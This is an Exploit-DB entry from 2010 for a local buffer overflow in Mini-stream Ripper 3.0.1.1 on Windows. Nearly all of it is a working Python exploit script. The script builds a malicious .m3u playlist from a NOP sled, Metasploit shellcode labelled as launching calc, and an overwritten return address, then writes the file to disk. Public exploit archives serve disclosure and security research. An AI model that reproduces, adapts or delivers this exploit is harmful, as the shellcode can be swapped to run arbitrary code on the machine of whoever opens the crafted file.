Mini-stream Ripper 3.0.1.1 - '.m3u' HREF Buffer Overflow

EDB-ID:

11682

CVE:

N/A

Author:

l3D

Type:

local

Platform:

Windows

Published:

2010-03-10

#!/usr/bin/env python
#Mini-stream Ripper 3.0.1.1 (.m3u) Buffer Overflow Code Execution
#Software Link: http://www.mini-stream.net/downloads/Mini-streamRipper.exe
#Author: l3D
#Site: http://xraysecurity.blogspot.com
#IRC: irc://irc.nix.co.il
#Email: pupipup33@gmail.com

nops1='\x90'*0x2a80
#system("calc") - Metasploit.com
shellcode=("\xb8\x19\xfc\x3c\x9b\xd9\xc4\x31\xc9\xb1\x32\xd9\x74\x24\xf4"
"\x5b\x83\xeb\xfc\x31\x43\x0e\x03\x5a\xf2\xde\x6e\xa0\xe2\x96"
"\x91\x58\xf3\xc8\x18\xbd\xc2\xda\x7f\xb6\x77\xeb\xf4\x9a\x7b"
"\x80\x59\x0e\x0f\xe4\x75\x21\xb8\x43\xa0\x0c\x39\x62\x6c\xc2"
"\xf9\xe4\x10\x18\x2e\xc7\x29\xd3\x23\x06\x6d\x09\xcb\x5a\x26"
"\x46\x7e\x4b\x43\x1a\x43\x6a\x83\x11\xfb\x14\xa6\xe5\x88\xae"
"\xa9\x35\x20\xa4\xe2\xad\x4a\xe2\xd2\xcc\x9f\xf0\x2f\x87\x94"
"\xc3\xc4\x16\x7d\x1a\x24\x29\x41\xf1\x1b\x86\x4c\x0b\x5b\x20"
"\xaf\x7e\x97\x53\x52\x79\x6c\x2e\x88\x0c\x71\x88\x5b\xb6\x51"
"\x29\x8f\x21\x11\x25\x64\x25\x7d\x29\x7b\xea\xf5\x55\xf0\x0d"
"\xda\xdc\x42\x2a\xfe\x85\x11\x53\xa7\x63\xf7\x6c\xb7\xcb\xa8"
"\xc8\xb3\xf9\xbd\x6b\x9e\x97\x40\xf9\xa4\xde\x43\x01\xa7\x70"
"\x2c\x30\x2c\x1f\x2b\xcd\xe7\x64\xc3\x87\xaa\xcc\x4c\x4e\x3f"
"\x4d\x11\x71\x95\x91\x2c\xf2\x1c\x69\xcb\xea\x54\x6c\x97\xac"
"\x85\x1c\x88\x58\xaa\xb3\xa9\x48\xc9\x52\x3a\x10\x0e")
nops2='\x90'*(0xa9ff-len(nops1+shellcode))
ret='\x30\x3D\x0D'
payload=nops1+shellcode+nops2+ret

evil="""<ASX Version="3.0">
<ENTRY>
    <REF HREF="%s"/>
</ENTRY>
</ASX>
""" % payload

bad=open('crash.m3u', 'w')
bad.write(evil)
bad.close()